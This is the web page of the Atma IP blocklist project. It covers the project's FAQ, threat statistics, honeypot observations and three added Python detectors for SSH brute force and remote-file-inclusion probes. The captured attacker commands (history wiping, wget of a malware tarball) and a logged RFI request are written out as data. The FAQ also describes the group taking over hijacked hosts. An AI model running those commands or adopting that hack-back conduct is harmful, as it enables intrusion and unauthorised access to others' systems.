
Mission
We identify, gather and classify dangerous IP addresses such as:
- Attackers who try to spy on or remotely control other people's computers through services such as Microsoft Terminal Services (Remote Desktop), SSH, Telnet or shared desktops (VNC).
- Threats to email servers or users: spiders/bots, account hijacking, etc.
- Sites spreading viruses, trojans, spyware, etc., or simply used by them to report back to their authors that a new computer has been infected.
- Threats to servers: exploits, fake identities/agents, DDoS attackers, etc.
- Port scans, which are usually the first step towards more dangerous actions.
- Malicious P2P sharers or bad peers who spread malware, inject bad traffic or share fake archives.
An updated list is published every 3-4 days, ready to be used with any blocking program. All you need to do is add it to your favourite program using one of the URLs below:
- http://www.atma.es/atma.p2p (*)
- http://galinux.myftp.org/atma.p2p (*)
- http://list.iblocklist.com/?list=tzmtqbbsgbtfxainogvm (Gz compressed)
- http://list.iblocklist.com/lists/atma/atma (Gz compressed)
Special thanks to those who have lately helped us by reporting errors in the list: "thajsta", "frisco.chico", "imvgilante2000", "yoshigoto95", "borjanogueiras", "rautamiekka", "gate.wizard", "meistersinger", "fakhir" and "marc.kuehrer".
Documentation
How-to 

Peerguardian 2 for Windows
IPlist/IPblock 0.26 for Linux
Peerblock: just add a new list and paste http://list.iblocklist.com/lists/atma/atma
FAQ
How can I use the blacklist/atma deny list?
Most blocking programs come with a few preconfigured lists. Unfortunately, blacklist/atma is not among them as far as we know, so you need to configure your blocking program yourself (see the how-tos above). While this is an easy task in every case, there are no universal instructions valid for all of them. Our list is published in the PeerGuardian 1 (P2P plaintext) format, one "description:first_ip-last_ip" range per line, which is compatible with nearly all existing programs and is human readable as is. If you are not using a blocking program yet, please go to the downloads section.
Concerning the terms of use, feel free to use it for any purpose as long as you keep the notice in its header (the comment lines at the top of the list), or give credit in any other fair way instead. If in doubt, please contact us.
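Since the list is plain text, loading it into your own tooling is straightforward. As an added Python example (not a tool from atma.es), the following parses a PeerGuardian P2P-format list, merges overlapping ranges, and answers "is this IP listed, and under which label?" in logarithmic time. The embedded sample list is constructed with RFC 5737 documentation addresses, not taken from the real list, and the .gz branch assumes the compressed mirrors serve plain gzip.

```python
import bisect
import gzip
import ipaddress
from typing import List, Optional, Tuple

# Constructed sample in PeerGuardian "P2P" plaintext format (the format the
# Atma list uses): '#' comment lines, then one "description:first-last" per
# line. Addresses are RFC 5737 documentation ranges, not real list entries.
SAMPLE_P2P = """\
# Constructed sample list, not the real atma.p2p
# Format: description:first_ip-last_ip
SSH Attack:203.0.113.0-203.0.113.255
Spammer:198.51.100.17-198.51.100.17
Port Scan Attack:192.0.2.128-192.0.2.191
Several Threats:192.0.2.160-192.0.2.200
"""

Range = Tuple[int, int, str]  # (first address as int, last address as int, label)


def parse_p2p(text: str) -> List[Range]:
    """Parse P2P-format text into a sorted list of non-overlapping ranges.

    Overlapping entries are merged (labels joined with "; ") so that the
    lookup below can use a plain binary search.
    """
    ranges: List[Range] = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        # The description may itself contain ':' so split on the LAST colon.
        label, sep, span = line.rpartition(":")
        if not sep or "-" not in span:
            raise ValueError(f"line {lineno}: not a P2P range entry: {raw!r}")
        first, last = (p.strip() for p in span.split("-", 1))
        start, end = int(ipaddress.IPv4Address(first)), int(ipaddress.IPv4Address(last))
        if end < start:
            raise ValueError(f"line {lineno}: reversed range: {raw!r}")
        ranges.append((start, end, label.strip()))
    ranges.sort()
    merged: List[Range] = []
    for start, end, label in ranges:
        if merged and start <= merged[-1][1]:  # overlaps the previous range
            pstart, pend, plabel = merged[-1]
            new_label = plabel if label in plabel.split("; ") else f"{plabel}; {label}"
            merged[-1] = (pstart, max(pend, end), new_label)
        else:
            merged.append((start, end, label))
    return merged


class Blocklist:
    """Membership test over a parsed P2P list: O(log n) per lookup."""

    def __init__(self, ranges: List[Range]) -> None:
        self.ranges = ranges
        self._starts = [r[0] for r in ranges]

    def lookup(self, ip: str) -> Optional[str]:
        """Return the label covering `ip`, or None if it is not listed."""
        n = int(ipaddress.IPv4Address(ip))
        i = bisect.bisect_right(self._starts, n) - 1
        if i >= 0 and self.ranges[i][0] <= n <= self.ranges[i][1]:
            return self.ranges[i][2]
        return None


def load_p2p_file(path: str) -> Blocklist:
    """Load a .p2p or .p2p.gz file (assumption: the gz mirrors serve plain gzip)."""
    opener = gzip.open if path.endswith(".gz") else open
    with opener(path, "rt", encoding="utf-8", errors="replace") as fh:
        return Blocklist(parse_p2p(fh.read()))


if __name__ == "__main__":
    bl = Blocklist(parse_p2p(SAMPLE_P2P))
    for ip in ("203.0.113.42", "192.0.2.170", "198.51.100.18"):
        print(ip, "->", bl.lookup(ip))
```

Two details matter with real lists: descriptions can contain colons, so the split is on the last one; and entries from different sources overlap, so the merge keeps every label rather than silently dropping one. A lookup of an address that is not listed returns None.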
Why should I use this list when my program of choice already comes with some others preconfigured?
Mainly for one reason: we believe that we identify a good number of threats not listed anywhere else before. This is how we try to do it:
- We identify most dangerous IPs with our own tools, which are not based on anyone else's. They should be harder to evade because attackers do not know how they work, even if they know they exist at all. Moreover, they cannot know where we are lurking, because we use dynamic IPs from different ISPs. In other words, when a threat is detected, the attacker will find their IP published within a few days, but we will have changed ours before that, so it is no use for them to review hundreds of logs or warn other attackers.
- We are Spanish speakers and we use that language for almost everything we do: websites, mailing, programming... Most attackers are either native English speakers or have very good skills in that language, but it is not very likely that they understand Spanish. That is why they may be detected by us without even knowing how and where it happened.
- For now, we are a small group. If we intend to harvest a large number of attacks we cannot just sit and wait for them to appear. So we do not rely on passive detection but try to attract as many attacks as possible instead (obviously, we cannot explain in detail how we do it).
Should I use this list alone or along with some others?
For one thing, the more lists you use, the harder they are for your computer to handle, which could be a problem if your hardware is old. On the other hand, although we add IPs from other sources, it is always safer to block them from several lists, perhaps ones updated more often than Atma, larger or more specialized. Since Atma is a multipurpose list, we believe it is suitable for most home and even professional users, especially those using P2P and/or running any kind of server. For your information, its contents as of March 2010 were as follows:
| Threat | IPs/ranges |
| Spammer | 20667 |
| Malware | 14846 |
| Unspecified Threat | 10979 |
| SSH Attack | 5348 |
| SMTP Port 25 Attack | 4183 |
| P2P Malware | 2704 |
| P2P Corrupted Packets | 2388 |
| Several Threats | 1577 |
| Threat For SQL Servers | 688 |
| Port Scan Attack | 554 |
| Proxy Seeker | 476 |
| Threat For Web Servers | 471 |
| Telnet Attack | 234 |
| MS-Terminal Attack | 191 |
| FTP Attack | 173 |
| P2P Unrequested Responses | 112 |
| VNC Attack | 68 |
| Others | 38 |
| Single IPs blocked | 88125 |
Bear in mind that we don't list IPs:
- Related to sex, ads, P2P trackers, etc., unless they explicitly pose a threat or risk.
- Shared by many domains (usually thousands), even though we know that some are certainly dangerous.
- Some of the reserved IPs/ranges for local networks, testing, etc. listed in http://tools.ietf.org/html/rfc3330 (since superseded by RFC 5735 and then RFC 6890).
- Belonging to the most used services, tools or companies: Google, Microsoft, Rapidshare, Yahoo and some others.
(Please note that even a common search in, say, Google could lead you to evil sites.)
If you want to block any of those, you definitely need extra lists.
How does an IP/range get delisted?
All IPs are deleted within 2-5 months, depending on a number of factors such as the kind of threat and its historical behaviour. Of course, we remove false positives as soon as we learn about them. As of June 2010, entries had been in the list since:
| IPs/ranges added within | IPs/ranges |
| Current month (June) | 40261 |
| 1-2 months ago (May) | 21420 |
| 2-3 months ago (April) | 21101 |
| 3-4 months ago (March) | 213 |
Can I get rid of antivirus, anti-spyware and firewalls?
Not at all. Using a blocking program along with our list, or any other, only prevents your computer from contacting certain others. That's all. For instance, you can still get your computer infected by sharing a memory card or by opening an infected email, even if it is delivered by a trustworthy ISP.
Despite already using the Atma list, I am still receiving spam.
Spammers' IPs are indeed targeted by us and included in the list, for one reason: those who send spam are very likely to pose other threats, notably to administrators of servers, forums, blogs, etc. We will never list IPs belonging to the most important providers, like Gmail, Hotmail, Yahoo, etc. Unfortunately, most spam comes from accounts at those companies. If you are not satisfied with their own filters and you use a mail client, you could try installing a filter on your computer.
Is atma/blacklist a widely used list?
We guess not at all until February 2010, but we had no reliable data other than that from one of the mirrors. As an indicative figure, the list had been downloaded more than 5000 times from there in January 2010. However, it is currently available at iblocklist.com, which is perhaps the most important mirror for blocking lists.
Do you hack?
No, we don't. Nevertheless, we took over a few hijacked hosts, for a number of reasons:
* One of the most aggressive and resilient ones at that moment.
* Risk of alerting the bad guys before the real administrator.
* Good chances of gathering the controllers' IPs and other data about them.
Those were: a Truetel host in Taiwan (2009), another belonging to a Tasmanian fireguard patrol (2010), an online shop in Poland (2011) and several corporate servers in Spain (2011) (still online; see why and further info in Spanish).
Currently (Oct. 2011) we have spotted the infamous 58.218.199.227, 58.218.199.147 and 58.218.199.250 from China (although the whole subnet has been active in the recent past, and other IPs such as 222.208.183.218 seem to be related to those scans). It is useless to complain or warn anyone, since they are not hijacked. We do not expect to see them offline but, if we succeed, they will be much less active than they were until September 2011. Should you want to help us, please drop us a line.
Also, we were greeting :) the MediaDefender guys at 208.86.198.xxx for a week in Nov. 2011, until the 22nd.
What do the descriptions mean?
When using a blocking program you will see different kinds of alerts. Those coming from our list fall into three main categories:
- Attacks targeting HTTP/SQL/FTP/PHP servers
- Peers that spoil P2P or use it to spread malware
- Other generic threats to most users and systems
Note this: each attack goes towards a specific target, but that does not mean the attacker would refuse to take advantage of unexpected vulnerabilities. The same goes for operating systems: you could see an "SSH attack" alert and think "well, I'm running Windows, which does not use that stuff, so I'm safe". Wrong. We are telling you that we have detected an SSH attack from that IP, and it is very likely that it could run other kinds of attacks too.
Some labels represent fairly benign actions, such as port scans or pinging. On the contrary, those labelled "Several threats" are the most dangerous.
Assorted facts
Some SSH attacks (commands as captured on our honeypots):
| Stage | Commands |
| Gathering information | w; uptime; id; ls -a; uname -a; cat /proc/cpuifno; ps x; wget; curl -O |
| After a previous successful login | rm -rf .bash_history; history -c; w; ps x; ls -a |
| Attempting to get rid of the honeypot | bash; sh; kill -9 -1; reboot; exit |
| Sending malware to the target | uname -a; passwd; wget http://nasa.undernet.nm.ru/udp.tgz; tar zxvf udp.tgz |
Other deliveries came from
Some flashy detections:
- Telnet scans from 128.59.14.100-128.59.14.116 (Columbia University), which happened to be a false positive. Read about their project. Nevertheless, after a re-visit in Sep. 2011, we found a number of things we dislike:
- They don't say when it will end; it is always an "ongoing" project. I guess that knocking at other people's doors should last as short a time as possible. Since they have moved on to SSH probing, what's next?
- They are making money off it: a company, several patents, sponsorship by several military offices, conferences, publications... Therefore, output about the results is scarce. If nobody else is going to benefit from the research, it does not make much difference compared to other daily scans.
- Fake results in the Gnutella network from 65.50.67.197 (www.markmonitor.com) in March 2010... when looking for public domain files!
- Port scan from 69.48.241.84 (www.trustedsource.org, owned by McAfee Antivirus) on 21 December 2009.
- Sharing fake files in the Gnutella network from 65.55.102.24 (Microsoft Corporation), 21 October and 1 November 2009.
- Port scan from 208.43.71.139 (Avast Antivirus) in September and October 2009.
Statistics of blocking programs downloading blacklist/atma during the first week of December 2009:
| Program/Version | Downloads |
| PeerBlock/1.0.0.181 | 760 |
| PeerGuardian/2.0 | 253 |
| PeerBlock/1.0.0.202 | 112 |
| PeerBlock/1.0.0.223 | 43 |
| BlockControl/1.6.9 | 14 |
| PeerBlock/0.9.2.86 | 7 |
| IPblock/0.18 | 4 |
| IPblock/0.27 | 4 |
| IPblock/0.26 | 2 |
| PeerBlock/1.0.0.187 | 1 |
| Program | Total |
| PeerBlock | 916 |
| PeerGuardian | 253 |
| BlockControl | 14 |
| IPblock | 11 |
(Totals as published; the per-version rows shown do not account for all of them.)
During September 2009 attackers tried to log in under 10374 different user names. The most attacked were:
| User name | Attempts | User name | Attempts |
| root | 9850 | testing | 132 |
| admin | 1034 | nagios | 130 |
| test | 690 | eric | 130 |
| oracle | 431 | david | 130 |
| user | 264 | web | 126 |
| guest | 224 | tester | 126 |
| robert | 208 | john | 124 |
| mysql | 206 | richard | 120 |
| michael | 195 | sarah | 115 |
| paul | 190 | sam | 114 |
| info | 190 | patrick | 114 |
| postgres | 177 | bruce | 110 |
| amanda | 176 | matt | 107 |
| adam | 176 | mark | 106 |
| sales | 168 | cyrus | 104 |
| martin | 166 | teste | 102 |
| backup | 162 | marc | 101 |
| student | 154 | webmaster | 100 |
| ftpuser | 152 | download | 100 |
| suporte | 148 | (name missing on the page) | 100 |
Advice: choosing user names in a language other than English is safer. Spanish speakers should avoid "David" (a common name in both languages). Bear in mind that an unusual user name only raises the cost of guessing; every attempt above was a password guess, so disabling password authentication in sshd (PasswordAuthentication no, with key-based logins) removes this attack class altogether.
Bad boys never sleep:
24 December 2009, nightfall. While many countries were celebrating Christmas Eve, attackers were taking advantage of it. The most striking one we detected during those hours was an SSH dictionary attack from 209.44.120.2. It lasted 8 hours and tried 20,859 username + password combinations.
7 July 2010. While millions were enjoying the Germany vs Spain FIFA World Cup 2010 semi-final, a host in Spain reported a (not actually) successful SSH dictionary attack:
Jul 7 19:27:42 (not shown) sshd[28641]: Accepted password for (not shown) from 76.191.100.182 port 47065 ssh2
Jul 7 20:25:37 (not shown) sshd[12823]: Accepted password for (not shown) from 121.189.19.126 port 46649 ssh2
Jul 7 21:17:08 (not shown) sshd[8048]: Accepted password for (not shown) from 79.112.214.99 port 1266 ssh2
Jul 7 23:45:48 (not shown) sshd[28775]: Accepted password for (not shown) from 221.111.75.119 port 33195 ssh2
Jul 7 23:47:14 (not shown) sshd[31450]: Accepted password for (not shown) from 221.111.75.119 port 51866 ssh2
Jul 7 23:53:28 (not shown) sshd[8496]: Accepted password for (not shown) from 188.24.255.242 port 30856 ssh2
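The user-name statistics above and the dictionary attacks in these two stories are the kind of thing a few lines of log analysis catch. What follows is an added Python example (not atma.es's own tooling): it parses sshd "Failed password" / "Accepted password" lines, tallies attempts per source and per user name, flags sources above a threshold as dictionary attacks, and flags an accepted login from a source that was just guessing. The log excerpt, the host name, the threshold of 5 and the RFC 5737 addresses are all constructed for the example.

```python
import re
from collections import Counter, defaultdict
from typing import Dict, Iterable, List, Tuple

# Matches the two sshd lines that matter here. "invalid user" appears when the
# account does not exist at all; the user name is captured either way.
SSHD_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Accepted|Failed) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\d{1,3}(?:\.\d{1,3}){3}) port \d+ ssh2"
)

# Constructed auth.log excerpt (RFC 5737 addresses); not a real capture.
SAMPLE_LOG = """\
Jul  7 19:01:02 host sshd[2101]: Failed password for root from 203.0.113.9 port 40001 ssh2
Jul  7 19:01:05 host sshd[2103]: Failed password for invalid user admin from 203.0.113.9 port 40002 ssh2
Jul  7 19:01:09 host sshd[2105]: Failed password for root from 203.0.113.9 port 40003 ssh2
Jul  7 19:01:12 host sshd[2107]: Failed password for invalid user test from 203.0.113.9 port 40004 ssh2
Jul  7 19:01:15 host sshd[2109]: Failed password for invalid user oracle from 203.0.113.9 port 40005 ssh2
Jul  7 19:01:18 host sshd[2111]: Failed password for root from 203.0.113.9 port 40006 ssh2
Jul  7 19:01:22 host sshd[2113]: Accepted password for root from 203.0.113.9 port 40007 ssh2
Jul  7 19:05:40 host sshd[2200]: Failed password for invalid user admin from 198.51.100.4 port 51000 ssh2
Jul  7 19:05:44 host sshd[2202]: Failed password for invalid user guest from 198.51.100.4 port 51001 ssh2
Jul  7 19:27:42 host sshd[2300]: Accepted password for alice from 192.0.2.10 port 47065 ssh2
Jul  7 19:30:00 host CRON[2400]: (root) CMD (run-parts /etc/cron.hourly)
"""


def parse_sshd(lines: Iterable[str]) -> List[Dict[str, str]]:
    """Return one dict per matching sshd password event, in log order."""
    events = []
    for line in lines:
        m = SSHD_RE.match(line)
        if m:
            events.append(m.groupdict())
    return events


def analyse(lines: Iterable[str], threshold: int = 5) -> dict:
    """Flag dictionary-attack sources and successes that followed many failures.

    threshold: failed attempts from one source before it counts as a
    dictionary attack (5 is an assumed value; tune it to your traffic).
    """
    failures_by_ip: Counter = Counter()
    users_by_ip: Dict[str, set] = defaultdict(set)
    usernames: Counter = Counter()
    guessed_logins: List[Tuple[str, str, str, int]] = []
    for ev in parse_sshd(lines):
        if ev["result"] == "Failed":
            failures_by_ip[ev["ip"]] += 1
            users_by_ip[ev["ip"]].add(ev["user"])
            usernames[ev["user"]] += 1
        elif failures_by_ip[ev["ip"]] >= threshold:
            # A success from a source that was just guessing is the event
            # worth paging on: the password was most likely found, not known.
            guessed_logins.append((ev["ts"], ev["user"], ev["ip"], failures_by_ip[ev["ip"]]))
    dictionary_sources = {
        ip: {"failures": n, "users_tried": sorted(users_by_ip[ip])}
        for ip, n in failures_by_ip.items()
        if n >= threshold
    }
    return {
        "dictionary_sources": dictionary_sources,
        "guessed_logins": guessed_logins,
        "top_usernames": usernames.most_common(),
    }


if __name__ == "__main__":
    report = analyse(SAMPLE_LOG.splitlines())
    for ip, info in report["dictionary_sources"].items():
        print(f"dictionary attack from {ip}: {info['failures']} failures, users {info['users_tried']}")
    for ts, user, ip, n in report["guessed_logins"]:
        print(f"{ts}: '{user}' accepted from {ip} after {n} failures -- investigate")
    print("most tried user names:", report["top_usernames"][:3])
```

The regex only covers password events; a real auth.log also carries publickey lines, and on systemd hosts the same records come from journalctl. Reading a Counter in the Accepted branch does not insert a key, so sources with no failures never appear in dictionary_sources.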
Weird ways of fighting cybercrime:
A visit from www.delitosinformaticos.gov.co (Colombian government agency "Grupo Investigativo Delitos Informáticos"): a remote file inclusion probe (the include_path parameter points at a remote .txt file, the classic way of making a vulnerable PHP script fetch attacker code), which returned 404 here:
200.93.147.154 - - [17/Feb/2010:13:57:49 +0200] "GET //poll//booth.php?include_path=http://www.iseulbi.com/id1.txt?? HTTP/1.1" 404 613 www.atma.es "-" "Mozilla/5.0" "-"
No comment :D
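The request above is worth a detector of its own: the telltale is a query parameter whose value is itself a URL. The following is an added Python example, not code from atma.es, that reads combined-format access-log lines and reports every such parameter, including percent-encoded ones. The log lines, addresses and the example.net host are constructed; the first line copies the shape of the probe quoted above.

```python
import re
from typing import Dict, Iterable, List
from urllib.parse import parse_qs

# Apache/nginx "combined"-style prefix: client, identd, user, timestamp,
# request line, status, size. Anything after size (vhost, referer, agent)
# is ignored because re.match only anchors at the start.
ACCESS_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>HTTP/[\d.]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# A parameter value that is itself a URL is the classic remote file
# inclusion probe (PHP include/require with allow_url_include on).
URL_VALUE_RE = re.compile(r"^(?:https?|ftp)://", re.IGNORECASE)

# Constructed access-log excerpt (RFC 5737 addresses, example.net host);
# the first request mirrors the shape of the probe quoted above.
SAMPLE_ACCESS_LOG = """\
203.0.113.77 - - [17/Feb/2010:13:57:49 +0200] "GET //poll//booth.php?include_path=http://example.net/id1.txt?? HTTP/1.1" 404 613 "-" "Mozilla/5.0"
198.51.100.5 - - [17/Feb/2010:13:58:02 +0200] "GET /index.php?page=news HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
203.0.113.77 - - [17/Feb/2010:13:58:10 +0200] "GET /index.php?page=http%3A%2F%2Fexample.net%2Fshell.txt HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
198.51.100.5 - - [17/Feb/2010:13:58:30 +0200] "POST /login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""


def find_rfi_probes(lines: Iterable[str]) -> List[Dict[str, str]]:
    """Return one finding per query parameter whose value is a remote URL."""
    findings = []
    for line in lines:
        m = ACCESS_RE.match(line)
        if not m:
            continue
        # Split on the first '?' by hand: urlsplit would read the leading
        # "//poll" of a doubled-slash path as a network location.
        path, _, query = m.group("target").partition("?")
        if not query:
            continue
        # parse_qs percent-decodes, so an encoded "http%3A%2F%2F" is caught too.
        for param, values in parse_qs(query, keep_blank_values=True).items():
            for value in values:
                if URL_VALUE_RE.match(value):
                    findings.append({
                        "ip": m.group("ip"),
                        "ts": m.group("ts"),
                        "path": path,
                        "param": param,
                        "value": value,
                        "status": m.group("status"),
                    })
    return findings


if __name__ == "__main__":
    for f in find_rfi_probes(SAMPLE_ACCESS_LOG.splitlines()):
        print(f"{f['ts']} {f['ip']} RFI probe: {f['path']}?{f['param']}=... -> {f['status']}")
```

Parameters that legitimately carry URLs (redirect targets such as next= or url=) will also match, so keep a per-application allowlist of parameter names. Do not discount 404 hits either: the source is scanning whether or not the script exists, which is exactly why the IP, not the request, is what ends up in a list like this one.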
Where on earth are the Honeypots?
After reading the FBI's "Cyber Crime Alert" report (spring of 2011), it seems the bad guys believe that here in Spain we run an incredible 69 per cent of the world's honeypots and, moreover, they share the IPs where honeypots are supposed to be. As for our own IPs, whether they are right or not must remain undisclosed, but the given percentage is utterly wrong. In fact, we do not know of any other honeypot here apart from ours.
A boo for a couple image-hosting places
In September 2011 our site suffered a persistent attack from 62.129.242.122, a (by then) hijacked server in Poland. We contacted the owners and studied the malware. As a result, we learned that those Indonesians were using a few image-sharing sites to host their "soft", so we contacted iconspedia.com and tinypic.com asking for their help (a third site was clearly involved in the malicious events). No answer at all.
Why does Nokia want to know my email password?
Did you know that when you use Nokia's email app you are giving them your address and password, as shown in this blog? In Nov. 2011 we checked it ourselves using a Nokia X3-02 and a Gmail account:
Get involved
1-Use and spread our list
Help us and help others by letting them know about us. You could link to us from your blog or website, tell your contacts about atma.es... Also, since downloads are steadily increasing, we would like to have the list (it is only 2-3 MB) mirrored on some more sites. If you are willing to set one up, please contact us.
2-Send us your logs
We have developed some automatic tools that collect, select, classify and merge IPs from a variety of logs. If you think that some on your system could help us, please drop us a line. For now, we can directly use logs from several P2P programs, some models of routers, Linux logs and a handful of other things.
3-Report assorted IPs/ranges
If you know how to identify them in a particular context, you could report them to us.
4-Run a "honey pot"
You can think of a "honey pot" as a disguise that turns your local network or computer into something completely different when seen from an attacker's point of view. Installing a basic one can be quite effective while being easy to set up. If you need a little help, here we are!
5-Warn us about false positives, changed IPs, etc.
Sometimes we may be wrong and add an innocent IP to the list. But that is not the only issue we have to face; for instance, we need to remove old entries once they have turned safe, exchange lots of info, deal with lots of emails... We will always welcome your help.
6-Special request for English speakers
This page in English is still a draft. We would like you to help us by warning us about typos, wrong expressions and so on.
Links
Blocking programs for Microsoft Windows
- PeerBlock
- PeerGuardian
- ProtoWall (not open source)
- OutPost Pro (not free)
- BeeThink IP blocker (not free)
Blocking programs for Linux
Blocking programs for Mac-OS
If you know about any other not listed here, please tell us.
Third-party sources
In our list we add the newest threats detected by other trustworthy sources, to whom we are indebted:
Amos.TwilightParadox.com Antispam.Andreotti.nl* Antivirus.neu.edu.cn Autoshun.org* Bizimbal.com Blackip.ustc.edu.cn Blocklist.de Boston.comites-it.org BotHunter.net Cert.ntnu.edu.tw Charles.the-haleys.org CheekyFreebies.com Check.Torproject.org Chriskujawski.com Clean-mx.de* Cyber-ta.org Cs.Rutgers.edu c64.gotdns.org Daiwa-comp.co.jp Danger.rulez.sk Darrenpopham.com DnsBL.Abuse.ch* Doetut.xs4all.nl* Dougnichols.org Dynastop.tanaya.net Dr-data.net Elfagr.net Escrow-fraud.com Elite-proxies.blogspot.com Elizabeth.czn.cz EmergingThreats.net Forum.emule-project.net Emule-security.net Esdevagrafica.com.br EvilDayStar.net FantasyForeverCreations.com Files.sabmx.net ForumPostersUnion.com FreeHairSecrets.com Fugitif.DynDns.org Furniture.co.ua GabyyHackerTeam Galf.org Gamble-Irwin-Group.com Genendesign.com Gw.Paraibuna.com.br Hackedreport.com Heise.de Iantighe.com IPillion.com Jainvestigation.com JayScott.co.uk Juniper.net Kish-telecom.com Mail.HogarDeCristo.org.ec Malc0de.com MaliciousNetworks.org* MalwareDomainList.com* MalwarePatrol.net MalwareURL.com MarSolucionesFinancieras.com Meganfath.com Merlot.com Mtc.sri.com MyIPtest.com MyWot.com/wiki NeilGunton.com Nethavoc.net NetSecDB.de Noamu.com Outten.co.uk Paradoxi.exisoft.nl Pellegrinilab.org PrairieHomeOutfitters.com Progressiverehabmuskego.com ProjectHoneyPot.org* ProSouthRealty.com Puaga.com Rblhu.net* RootKitKiller.com Rynearson.com Sans.org* Sblam.com SB-innovation.de SecurityNewsPortal.com Senderbase.org Semeliker.net Shinshu.fm Slyparadox.com Snortattack.org Spam-ip.com sshBL.org* Stats.denyhosts.net StopForumSpam.com Sudosecure.net Tcc.edu.tw Thalamus.no-ip.com TheHackedReport.com Threatexpert.com Trustedsource.org Twitter.com/bannedIPs Twitter.com/hashza Twitter.com/HoneyPoint* Twitter.com/olaf_j* Uceprotect.net Unusualdischarge.com Ustc.edu.cn VillagePlayers.org VirtualSupplyNet.com Vitapatent.com Websworld.org Xml.SsdSandBox.net 192.192.205.93
Note: when you query an IP/range, the result may show one of the sources marked with * above instead of a generic label.
Please note that we select IPs following our own criteria rather than automatically adding every single one from every single source. That's why you may find IPs that are listed in some of them but missing from the Atma deny list.
Contact
Visit our Google group (Spanish only) or send us an email.

